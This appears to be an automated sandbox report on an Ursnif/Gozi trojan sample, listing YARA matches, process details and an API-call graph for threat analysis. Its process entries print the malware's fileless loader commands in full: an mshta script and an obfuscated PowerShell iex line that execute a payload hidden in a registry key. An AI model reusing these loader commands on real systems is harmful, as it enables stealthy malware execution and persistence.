                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:4
                                      Start time:09:31:00
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\mshta.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                      Imagebase:0x7ff619b50000
                                      File size:14848 bytes
                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:5
                                      Start time:09:31:01
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                      Imagebase:0x7ff7fbaf0000
                                      File size:447488 bytes
                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      Reputation:high

                                      Target ID:6
                                      Start time:09:31:01
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7fcd70000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:7
                                      Start time:09:31:09
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
                                      Imagebase:0x7ff789be0000
                                      File size:2739304 bytes
                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:moderate

                                      Target ID:8
                                      Start time:09:31:10
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
                                      Imagebase:0x7ff6bdf40000
                                      File size:47280 bytes
                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:9
                                      Start time:09:31:11
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
                                      Imagebase:0x7ff789be0000
                                      File size:2739304 bytes
                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:moderate

                                      Target ID:10
                                      Start time:09:31:12
                                      Start date:13/10/2022
                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
                                      Imagebase:0x7ff6bdf40000
                                      File size:47280 bytes
                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:11
                                      Start time:09:31:18
                                      Start date:13/10/2022
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff69bc80000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown

                                      Target ID:12
                                      Start time:09:31:20
                                      Start date:13/10/2022
                                      Path:C:\Windows\System32\control.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\control.exe -h
                                      Imagebase:0x7ff7f7f70000
                                      File size:117760 bytes
                                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                        Memory Dump Source
                                        • Source File: 00000004.00000003.630100383.00000212A46D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000212A46D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_3_212a46d0000_mshta.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction ID: 7a53f4b7a879c98e029cb894b1bb45510ceb3ad59910d87bd1414a281d37dc80
                                        • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                        • Instruction Fuzzy Hash: 0D900214495946D9D41811920C4929C5040A7D8554FE884809C1690144D54D42AA1162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.8%
                                        Total number of Nodes:477
                                        Total number of Limit Nodes:37
                                        execution_graph 14754 4a3140 14755 4a3167 14754->14755 14758 4a31bb 14754->14758 14756 4a31ad 14755->14756 14755->14758 14759 4a31db 14755->14759 14757 49342c 4 API calls 14756->14757 14757->14758 14759->14758 14760 49342c 4 API calls 14759->14760 14760->14758 14472 4a3e45 14473 4a3e5d 14472->14473 14475 4a3e7f 14472->14475 14476 48c868 14473->14476 14477 48c8a8 14476->14477 14481 48c8b0 14477->14481 14482 4a7c24 14477->14482 14479 48c995 14480 4a7c24 3 API calls 14479->14480 14479->14481 14480->14481 14481->14475 14483 4a7c4c 14482->14483 14484 4a7c88 14483->14484 14486 4a62bc 14483->14486 14484->14479 14487 4a62ee 14486->14487 14492 492904 14487->14492 14489 4a65f9 14489->14484 14490 4a6472 14490->14489 14496 4a8554 14490->14496 14493 492922 14492->14493 14495 492927 14492->14495 14494 4a8554 3 API calls 14493->14494 14494->14495 14495->14490 14497 4a857f 14496->14497 14498 497ca8 3 API calls 14497->14498 14499 4a85a5 14498->14499 14500 4a85db 14499->14500 14502 49d6a0 14499->14502 14500->14489 14503 49d6b9 14502->14503 14505 49d6df 14503->14505 14506 486a60 14503->14506 14505->14500 14507 482e84 2 API calls 14506->14507 14508 486a93 14507->14508 14508->14505 14186 4bd158 14187 4bd0a2 14186->14187 14188 4bd31c 14187->14188 14189 4bd237 NtProtectVirtualMemory 14187->14189 14189->14188 14190 4bd288 14189->14190 14190->14188 14191 4bd2d0 NtProtectVirtualMemory 14190->14191 14191->14188 14191->14190 14781 49cf64 14782 49cf7b 14781->14782 14783 497ca8 3 API calls 14782->14783 14789 49cfc1 14782->14789 14784 49cf84 14783->14784 14785 485b28 4 API calls 14784->14785 14786 49cf8e 14785->14786 14787 49cf9c 14786->14787 14788 49887c 4 API calls 14786->14788 14787->14789 14790 4a5b38 4 API calls 14787->14790 14788->14787 14790->14789 14795 4a5378 14796 4a53b4 14795->14796 14797 4a545a 14795->14797 14796->14797 14798 49879c 2 API calls 14796->14798 14799 4a5445 14798->14799 14800 4a66fc 5 API calls 14799->14800 14800->14797 14523 
4ac672 14524 4ac67e 14523->14524 14525 4ac89c LoadLibraryA 14524->14525 14526 4ac6bd 14525->14526 14527 4a4473 14528 4a447f 14527->14528 14530 4a448d 14528->14530 14531 4a0628 14528->14531 14534 4a0646 14531->14534 14532 4a06be 14532->14530 14533 49879c 2 API calls 14533->14532 14534->14532 14534->14533 14535 4a1a70 14536 4a1ba8 14535->14536 14537 4a1aa6 14535->14537 14537->14536 14539 4a33f4 14537->14539 14540 4a3458 14539->14540 14541 492904 3 API calls 14540->14541 14542 4a3790 14540->14542 14543 4a351b 14541->14543 14542->14536 14543->14542 14544 4a8554 3 API calls 14543->14544 14544->14542 14809 484508 14810 484551 14809->14810 14811 4845c7 14810->14811 14812 49e674 FindCloseChangeNotification 14810->14812 14812->14811 14813 495108 14814 482e84 2 API calls 14813->14814 14815 49513c 14814->14815 14816 49e334 2 API calls 14815->14816 14817 49515d 14815->14817 14816->14817 14818 4a62bc 3 API calls 14817->14818 14820 49526e 14817->14820 14818->14820 14819 49543b 14820->14819 14821 49879c 2 API calls 14820->14821 14823 49534b 14821->14823 14823->14819 14824 482178 14823->14824 14825 482606 14824->14825 14828 4821c6 14824->14828 14826 4828c8 14825->14826 14827 482a07 14825->14827 14846 482226 14825->14846 14833 4a7c24 3 API calls 14826->14833 14826->14846 14832 49d6a0 2 API calls 14827->14832 14827->14846 14829 4821ec 14828->14829 14830 4822f7 14828->14830 14838 4821f2 14828->14838 14828->14846 14831 4822c9 14829->14831 14829->14838 14836 48237d 14830->14836 14837 482317 14830->14837 14830->14846 14835 48c868 3 API calls 14831->14835 14831->14846 14834 482aba 14832->14834 14833->14846 14839 486748 4 API calls 14834->14839 14834->14846 14835->14846 14843 4ab608 6 API calls 14836->14843 14836->14846 14837->14846 14847 4830ac 14837->14847 14840 48223a 14838->14840 14844 4824a3 14838->14844 14838->14846 14839->14846 14841 49d6a0 2 API calls 14840->14841 14840->14846 14841->14846 14843->14846 14844->14846 14851 49bbf4 14844->14851 14846->14823 14849 4830e9 14847->14849 
14848 483162 14848->14846 14849->14848 14850 4a33f4 3 API calls 14849->14850 14850->14848 14853 49bc14 14851->14853 14852 49bca4 14852->14846 14853->14852 14854 49c73c 3 API calls 14853->14854 14854->14852 14552 4bd002 14557 4bd007 14552->14557 14553 4bd237 NtProtectVirtualMemory 14554 4bd31c 14553->14554 14555 4bd288 14553->14555 14555->14554 14556 4bd2d0 NtProtectVirtualMemory 14555->14556 14556->14554 14556->14555 14557->14553 14557->14554 14557->14557 14859 4ac703 14860 4ac70f 14859->14860 14861 4ac89c LoadLibraryA 14860->14861 14861->14860 14562 4ac800 14563 4ac70f 14562->14563 14563->14562 14564 4ac89c LoadLibraryA 14563->14564 14564->14563 14569 48de10 14570 48de38 14569->14570 14571 48df08 14570->14571 14573 49e674 14570->14573 14574 49e68b 14573->14574 14575 49e68f 14574->14575 14576 4864f4 FindCloseChangeNotification 14574->14576 14575->14571 14576->14575 14581 49703c 14582 497077 14581->14582 14583 49704d 14581->14583 14583->14582 14585 4a564c 14583->14585 14587 4a5678 14585->14587 14586 4a5802 14586->14582 14587->14586 14589 4aaeb8 14587->14589 14591 4aaef2 14589->14591 14590 4aaffc 14590->14586 14591->14590 14592 4a33f4 3 API calls 14591->14592 14592->14590 14983 4a3deb 14984 4a3e06 14983->14984 14985 4a3e2d 14984->14985 14986 48c868 3 API calls 14984->14986 14986->14985 14633 4a3ee9 14634 48c868 3 API calls 14633->14634 14635 4a3f17 14634->14635 14636 4866ec 14637 486723 14636->14637 14638 4866fa 14636->14638 14638->14637 14640 487c30 14638->14640 14641 487c7d 14640->14641 14642 487c43 14640->14642 14641->14637 14643 4a33f4 3 API calls 14642->14643 14643->14641 14994 4929ec 14995 492a26 14994->14995 14996 49879c 2 API calls 14995->14996 14997 492bbc 14995->14997 14996->14997 14644 4a2cec 14646 4a2d41 14644->14646 14645 4a1298 5 API calls 14647 4a2ed7 14645->14647 14646->14645 14646->14647 14998 4a5bec 14999 4a5c35 14998->14999 15000 49e674 FindCloseChangeNotification 14999->15000 15001 4a5cab 14999->15001 15000->15001 14652 4a8ae0 14653 4a8b12 
14652->14653 14657 4a8bf9 14653->14657 14662 486748 14653->14662 14656 486748 4 API calls 14658 4a8b96 14656->14658 14658->14657 14659 486748 4 API calls 14658->14659 14660 4a8bca 14659->14660 14660->14657 14661 486748 4 API calls 14660->14661 14661->14657 14664 48677c 14662->14664 14663 48688b 14663->14656 14663->14657 14664->14663 14666 482e84 2 API calls 14664->14666 14669 486806 14664->14669 14667 4867eb 14666->14667 14668 49e334 2 API calls 14667->14668 14667->14669 14668->14669 14669->14663 14670 483a00 14669->14670 14671 483a23 14670->14671 14672 483a50 14671->14672 14673 49879c 2 API calls 14671->14673 14672->14663 14673->14672 15002 4a43e4 15003 4a43f4 15002->15003 15005 4a441f 15002->15005 15004 49879c 2 API calls 15003->15004 15003->15005 15004->15005 15009 4a49fc 15011 4a4a33 15009->15011 15010 4a4bb4 15011->15010 15012 487c30 RegCreateKeyA RegOpenKeyA RegQueryValueExA 15011->15012 15012->15011 15013 4833f4 15014 485e14 2 API calls 15013->15014 15015 483439 15014->15015 14686 4ac6f7 14687 4ac67e 14686->14687 14688 4ac89c LoadLibraryA 14687->14688 14689 4ac6bd 14688->14689 14689->14689 14690 49008c 14691 4900b7 14690->14691 14693 490143 14690->14693 14692 49342c 4 API calls 14691->14692 14691->14693 14692->14693 14192 4ac89c 14193 4ac940 14192->14193 14195 4ac91b 14192->14195 14194 4ac9d4 LoadLibraryA 14193->14194 14193->14195 14194->14195 15042 495f90 15043 495fc2 15042->15043 15044 49601f 15043->15044 15045 4a9d54 9 API calls 15043->15045 15045->15044 14714 4a3e97 14715 4a3eaf 14714->14715 14716 4a3ed1 14714->14716 14717 48c868 3 API calls 14715->14717 14717->14716 15049 4a41aa 15050 4a41af 15049->15050 15052 4a41c1 15049->15052 15051 49879c 2 API calls 15050->15051 15051->15052 15053 49d6a0 2 API calls 15052->15053 15054 4a422d 15053->15054 15055 4a426f 15054->15055 15056 49879c 2 API calls 15054->15056 15056->15055 14196 48ada0 14197 48adaf 14196->14197 14198 48adcb 14196->14198 14197->14198 14200 49d6f0 14197->14200 14201 49d728 HeapCreate 
14200->14201 14203 49d75c 14201->14203 14206 49d764 14201->14206 14203->14198 14206->14203 14208 495700 14206->14208 14210 495725 14208->14210 14209 4957b2 14212 49c35c 14209->14212 14210->14209 14211 4957a9 FindCloseChangeNotification 14210->14211 14211->14209 14213 49c3ac 14212->14213 14214 49c3c9 StrRChrA 14213->14214 14215 49c3dd 14213->14215 14214->14215 14224 49e6c4 14215->14224 14218 49c4d8 14218->14203 14220 49c4ad 14220->14218 14221 49c4ba RtlAddVectoredContinueHandler 14220->14221 14222 49c4d0 14220->14222 14221->14222 14236 4963e0 14222->14236 14225 49e6e1 14224->14225 14226 49c442 14225->14226 14227 49e75a NtQueryInformationToken 14225->14227 14226->14218 14232 49039c 14226->14232 14228 49e795 14227->14228 14229 49e79d NtQueryInformationToken 14228->14229 14230 49e7f0 NtClose 14228->14230 14231 49e7ca 14229->14231 14230->14226 14231->14230 14233 4903da 14232->14233 14235 490401 14233->14235 14263 49d054 14233->14263 14235->14220 14237 496417 14236->14237 14238 4964a1 CreateMutexExA 14237->14238 14262 4964d3 14237->14262 14239 4964c0 14238->14239 14240 4966dc GetUserNameA 14239->14240 14239->14262 14241 4966f9 14240->14241 14247 4968d5 14241->14247 14241->14262 14269 4ab608 14241->14269 14245 4969ba 14281 497ca8 14245->14281 14246 496970 14246->14245 14308 49887c 14246->14308 14247->14262 14276 485b28 14247->14276 14249 4969d1 14288 4aa2cc 14249->14288 14251 496a44 14252 496dcd 14251->14252 14260 496b0a 14251->14260 14251->14262 14252->14262 14325 482e84 14252->14325 14254 496dfb 14259 496e21 14254->14259 14329 49e334 RegQueryValueExA 14254->14329 14256 482e84 2 API calls 14257 496ebf 14256->14257 14258 49e334 2 API calls 14257->14258 14257->14262 14258->14262 14259->14256 14260->14262 14320 4a1298 14260->14320 14262->14218 14267 49d09b 14263->14267 14264 49d23d 14264->14235 14266 49d1b4 lstrcmp 14266->14267 14267->14264 14267->14266 14268 49d20b RtlDeleteBoundaryDescriptor 14267->14268 14268->14264 14270 4ab62f 14269->14270 14332 48e7f8 14270->14332 
14272 4ab756 14272->14247 14273 4ab740 RtlDeleteBoundaryDescriptor 14273->14272 14274 4ab6a2 14274->14272 14274->14273 14275 48e7f8 5 API calls 14274->14275 14275->14274 14277 482e84 2 API calls 14276->14277 14278 485b55 14277->14278 14279 49e334 2 API calls 14278->14279 14280 485b72 14278->14280 14279->14280 14280->14246 14282 482e84 2 API calls 14281->14282 14283 497ce4 14282->14283 14284 497cf5 RegQueryValueExA 14283->14284 14285 497d28 14283->14285 14284->14285 14287 497db6 14285->14287 14366 49879c 14285->14366 14287->14249 14289 4aa2ee 14288->14289 14290 4aa384 14288->14290 14293 4aa37a 14289->14293 14294 4aa2fb 14289->14294 14306 4aa36e 14289->14306 14291 4aa38f 14290->14291 14292 4aa453 14290->14292 14297 4aa31f 14291->14297 14298 4aa3a1 14291->14298 14304 4aa42c 14291->14304 14389 4a0b90 14292->14389 14376 4a7de0 14293->14376 14294->14292 14300 4aa367 14294->14300 14301 4aa314 14294->14301 14294->14306 14369 4a9d54 14297->14369 14298->14300 14298->14304 14299 4aa362 14299->14306 14397 4a5b38 14299->14397 14300->14306 14380 492424 14300->14380 14301->14297 14301->14300 14305 492424 10 API calls 14304->14305 14304->14306 14305->14306 14306->14251 14309 49889e 14308->14309 14310 498c98 14309->14310 14312 482e84 2 API calls 14309->14312 14319 498ced 14309->14319 14311 482e84 2 API calls 14310->14311 14314 498ccc 14311->14314 14313 498c6b 14312->14313 14315 498c8c 14313->14315 14316 49e334 2 API calls 14313->14316 14318 49e334 2 API calls 14314->14318 14314->14319 14315->14310 14468 48cda8 14315->14468 14316->14315 14318->14319 14319->14245 14321 48e7f8 5 API calls 14320->14321 14323 4a12c8 14321->14323 14322 4a1327 14322->14262 14323->14322 14324 48e7f8 5 API calls 14323->14324 14324->14323 14326 482eb4 RegOpenKeyA 14325->14326 14327 482ea7 RegCreateKeyA 14325->14327 14328 482ebf 14326->14328 14327->14328 14328->14254 14330 49e3dc RegCloseKey 14329->14330 14331 49e37e 14329->14331 14330->14259 14331->14330 14333 48e823 14332->14333 14338 48e82b 14332->14338 
14345 494e14 NtQueryInformationProcess 14333->14345 14335 48e932 14335->14274 14338->14335 14339 48a280 14338->14339 14347 48fb94 14338->14347 14340 48a2bd 14339->14340 14343 48a2d6 14340->14343 14360 4aae0c VirtualProtect 14340->14360 14343->14338 14344 48a39d VirtualProtect 14344->14343 14346 494e44 14345->14346 14346->14338 14348 48fbd1 14347->14348 14349 4aae0c VirtualProtect 14348->14349 14351 48fd4e 14348->14351 14350 48fbf9 14349->14350 14350->14351 14362 48e1b0 14350->14362 14351->14338 14353 48fcbb VirtualProtect 14354 48fcec 14353->14354 14358 494e14 NtQueryInformationProcess 14354->14358 14355 48fc29 14355->14351 14355->14353 14356 4aae0c VirtualProtect 14355->14356 14357 48fc73 14356->14357 14357->14353 14359 48fc77 VirtualProtect 14357->14359 14358->14351 14359->14353 14361 48a382 14360->14361 14361->14343 14361->14344 14363 48e1e4 14362->14363 14365 48e282 14362->14365 14364 48fb94 4 API calls 14363->14364 14363->14365 14364->14365 14365->14355 14367 482e84 2 API calls 14366->14367 14368 4987d6 14367->14368 14368->14287 14370 4a9d67 14369->14370 14371 4a9dcb 14370->14371 14372 4a9d84 14370->14372 14373 4a9dc9 14371->14373 14404 4935c8 14371->14404 14374 4a1298 5 API calls 14372->14374 14373->14299 14374->14373 14377 4a7e22 14376->14377 14378 4a1298 5 API calls 14377->14378 14379 4a7e4a 14377->14379 14378->14379 14379->14299 14416 484b64 14380->14416 14382 492440 14383 484b64 5 API calls 14382->14383 14386 492463 14382->14386 14383->14386 14384 4924fc SleepEx 14387 492510 14384->14387 14385 492545 14385->14306 14386->14384 14386->14385 14386->14387 14387->14385 14422 49342c 14387->14422 14390 4a0bbd 14389->14390 14390->14390 14394 4a0d30 14390->14394 14457 4acb8c 14390->14457 14393 48e7f8 5 API calls 14395 4a0cb9 14393->14395 14394->14299 14395->14394 14396 48e7f8 5 API calls 14395->14396 14396->14395 14398 482e84 2 API calls 14397->14398 14399 4a5b5c 14398->14399 14400 49e334 2 API calls 14399->14400 14403 4a5b77 14399->14403 14400->14403 14402 4a5be3 
14402->14306 14465 485e14 14403->14465 14409 4935f8 14404->14409 14405 4937b1 14405->14373 14406 482e84 2 API calls 14407 4936e4 14406->14407 14408 493705 14407->14408 14410 49e334 2 API calls 14407->14410 14408->14405 14412 4a66fc 14408->14412 14409->14405 14409->14406 14410->14408 14414 4a671c 14412->14414 14413 4a6875 14413->14405 14414->14413 14415 48e7f8 5 API calls 14414->14415 14415->14413 14417 484b7e 14416->14417 14434 4a0150 14417->14434 14420 484baa 14420->14382 14421 4a0150 5 API calls 14421->14420 14423 493465 14422->14423 14424 495700 FindCloseChangeNotification 14423->14424 14433 49347a 14423->14433 14425 493491 14424->14425 14426 4934a4 NtSetInformationProcess 14425->14426 14428 4934d5 14425->14428 14425->14433 14427 4934cd 14426->14427 14426->14428 14448 4a0a50 NtQueryInformationProcess 14427->14448 14428->14433 14449 4ab778 14428->14449 14431 493540 14431->14433 14453 4864f4 14431->14453 14433->14385 14435 4a018f 14434->14435 14436 4a019b RegOpenKeyExA 14435->14436 14440 484b92 14435->14440 14437 4a01be 14436->14437 14437->14440 14444 4a6934 RegQueryValueExA 14437->14444 14440->14420 14440->14421 14441 4a0232 RegCloseKey 14441->14440 14442 4a6934 3 API calls 14443 4a022d 14442->14443 14443->14441 14445 4a698d RtlAllocateHeap 14444->14445 14447 4a020b 14444->14447 14446 4a69de RegQueryValueExA 14445->14446 14445->14447 14446->14447 14447->14441 14447->14442 14448->14428 14450 4ab7de CreateRemoteThread 14449->14450 14451 4ab7ac 14449->14451 14452 4ab7d4 14450->14452 14451->14450 14451->14452 14452->14431 14454 486536 14453->14454 14455 495700 FindCloseChangeNotification 14454->14455 14456 486554 14455->14456 14456->14433 14458 4a0c9a 14457->14458 14459 4acbc1 14457->14459 14458->14393 14459->14458 14461 4ac89c 14459->14461 14462 4ac940 14461->14462 14464 4ac91b 14461->14464 14463 4ac9d4 LoadLibraryA 14462->14463 14462->14464 14463->14464 14464->14459 14466 482e84 2 API calls 14465->14466 14467 485e53 14466->14467 14467->14402 14469 48cf16 
